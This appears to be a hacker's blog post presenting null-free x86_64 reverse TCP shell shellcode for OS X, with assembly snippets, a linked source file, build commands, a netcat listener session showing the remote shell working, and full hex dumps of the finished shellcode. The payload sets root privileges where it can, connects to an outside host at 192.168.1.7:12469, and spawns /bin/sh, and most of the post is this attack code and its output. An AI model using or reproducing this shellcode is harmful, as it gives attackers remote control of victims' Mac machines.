OS X x86_64 reverse TCP shell shellcode

1. OS X x86_64 (null-free) reverse TCP shell shellcode
2.  
3. So, i just realized that x86_64 linux syscalls are actually not that different from how they work on current x86_64 Macs (10.7/10.8 and probably before that, too). Which is useful, because while x86_64 linux is great for servers, it is not a widely used client/desktop platform - and Mac is, let's say, under-targeted.
4.  
5. There are really just two tricky things I ran into:
6.  
7. 1. To make Unix syscalls on OS X, you need to put 0x02 in the upper order bits of the value you put in rax.
8. 2. You ... eh... actually have to look up BSD syscall numbers, rather than use the 0x86_64 linux values ;)
9.  
10. This #2 seems obvious in hindsight, but if you don't realize, assembly debugging is not exactly going to tell you "hey, moron, you're using the wrong numbering scheme for this platform". Had a good laugh at myself when i finally realized.
11.  
12. #1 i solved by storing this base value in r9, which i could then easily copy into rax, then add/or the relevant BSD syscall number on top of it.
13.  
14. Setting up r9: (null free)
15.  
16. xor r9d,r9d
17. mov r9b, 0x02
18. shl r9, 24
19.  
20. i.e. make sure r9 = 0x0, mov 0x02 into it, and then shift left 24 bits to make 0x2000000.
21.  
22. Then, when i need to make a syscall, like socket, f.i., i mov r9 into rax, then add the syscall number:
23.  
24. mov rax, r9
25. add al, sys_socket ; 97
26. mov dil, AF_INET ; 2
27. mov sil, SOCK_STREAM ; 1
28. xor edx, edx
29. syscall
30.  
31. The reverse tcp shell code itself is pretty standard/straight-forward. set root privs if we can, create a socket, connect to 192.168.1.7:12469, and if successful, dup2 in a loop to attach stdin, stdout and stderr. Then run an execve to /bin/sh
32.  
33. The source is here:
34.  
35. reverse_tcp_shell_osx.s: http://pastebin.com/tcdHaaQa
36.  
37.  
38. To use nasm on OS X, the easiest (though likely not the fastest) way is to install Xcode from the app store. This is free, but only works on 10.7 and up. For older versions you have to get an Apple Developer account.
39.  
40. Then, download the command line tools. This gives you gcc and nasm, but the nasm will be v 0.95 or something. download nasm source and compile (it's basic configure/make stuff)
41.  
42. compile reverse_tcp_shell_osx.s like this:
43.  
44. nasm -f macho64 -g -o reverse_tcp_shell_osx.o reverse_tcp_shell_osx.s
45. ld -o reverse_tcp_shell_osx reverse_tcp_shell_osx.o
46.  
47. (the "g" is to ease navigation in gdb. you can leave it out)
48.  
49. To test, i simply started a nc on the remote host (add -v/vv if you like):
50.  
51. # nc -l -p 12469
52. id
53. uid=501(xxxxxx) gid=20(staff) groups=20(staff),101(com.apple.sharepoint.group.1),12(everyone),....
54. pwd
55. /Users/xxxxxx/Dxxxxxxx/xxxxxxx
56. w
57. 19:57 up 11:13, 3 users, load averages: 0.33 1.11 0.92
58. USER TTY FROM LOGIN@ IDLE WHAT
59. xxxxxxx console - 8:45 11:12 -
60. xxxxxxx s000 - 19:55 - w
61. ^C
62.  
63.  
64. De-nulling the original mostly 64-bit register code was virtually entirely a question of just playing with short/long register names. And with a 192.168.1.7 ip address no trouble there either. But AF_INET in the sockaddr struct comes out as 0x0002. So, without some kind of masking, this leave a null-byte:
65.  
66. otool -td reverse_tcp_shell_osx
67. reverse_tcp_shell_osx:
68. (__TEXT,__text) section
69. 0000000000001f79 45 31 c9 41 b1 02 49 c1 e1 18 4c 89 c8 04 7e 31
70. 0000000000001f89 ff 31 f6 0f 05 4c 89 c8 04 61 40 b7 02 40 b6 01
71. 0000000000001f99 31 d2 0f 05 48 89 c7 31 c0 50 48 b8 02 00 30 b5
72. 0000000000001fa9 c0 a8 01 07 50 48 89 e6 31 d2 b2 10 4c 89 c8 04
73. 0000000000001fb9 62 0f 05 31 f6 40 38 c6 72 31 4c 89 c8 04 5a 0f
74. 0000000000001fc9 05 40 80 fe 02 40 fe c6 76 f0 4c 89 c8 04 3b 48
75. 0000000000001fd9 bf 2f 62 69 6e 2f 73 68 ff 48 c1 e7 08 48 c1 ef
76. 0000000000001fe9 08 57 48 89 e7 31 f6 31 d2 0f 05 48 89 ec 4c 89
77. 0000000000001ff9 c8 0c 01 31 ff 0f 05
78.  
79. otool -td reverse_tcp_shell_osx | grep " 00"
80. 0000000000001f99 31 d2 0f 05 48 89 c7 31 c0 50 48 b8 02 00 30 b5
81.  
82. so, i use an old trick by just adding 0x0101 and then subbing that from (r)ax in the next instruction, before we push it to the stack (pointer to this struct will go into rsi):
83.  
84. mov rax, 0x701a8c0b5300103 ;192.168.1.7:12469 + AF_INET in network order (0002 masked)
85. sub ax, 0x0101
86.  
87. Now, no more null-bytes:
88.  
89. otool -td reverse_tcp_shell_osx
90. reverse_tcp_shell_osx:
91. (__TEXT,__text) section
92. 0000000000001f75 45 31 c9 41 b1 02 49 c1 e1 18 4c 89 c8 04 7e 31
93. 0000000000001f85 ff 31 f6 0f 05 4c 89 c8 04 61 40 b7 02 40 b6 01
94. 0000000000001f95 31 d2 0f 05 48 89 c7 31 c0 50 48 b8 03 01 30 b5
95. 0000000000001fa5 c0 a8 01 07 66 2d 01 01 50 48 89 e6 31 d2 b2 10
96. 0000000000001fb5 4c 89 c8 04 62 0f 05 31 f6 40 38 c6 72 31 4c 89
97. 0000000000001fc5 c8 04 5a 0f 05 40 80 fe 02 40 fe c6 76 f0 4c 89
98. 0000000000001fd5 c8 04 3b 48 bf 2f 62 69 6e 2f 73 68 ff 48 c1 e7
99. 0000000000001fe5 08 48 c1 ef 08 57 48 89 e7 31 f6 31 d2 0f 05 48
100. 0000000000001ff5 89 ec 4c 89 c8 0c 01 31 ff 0f 05
101.  
102. otool -td reverse_tcp_shell_osx | grep " 00"
103.  
104.  
105. So, you can easily write your syscall-based assembly/shellcode in either OS X x86_64 or linux x86_64 and with just minimal modification port it to the other platform.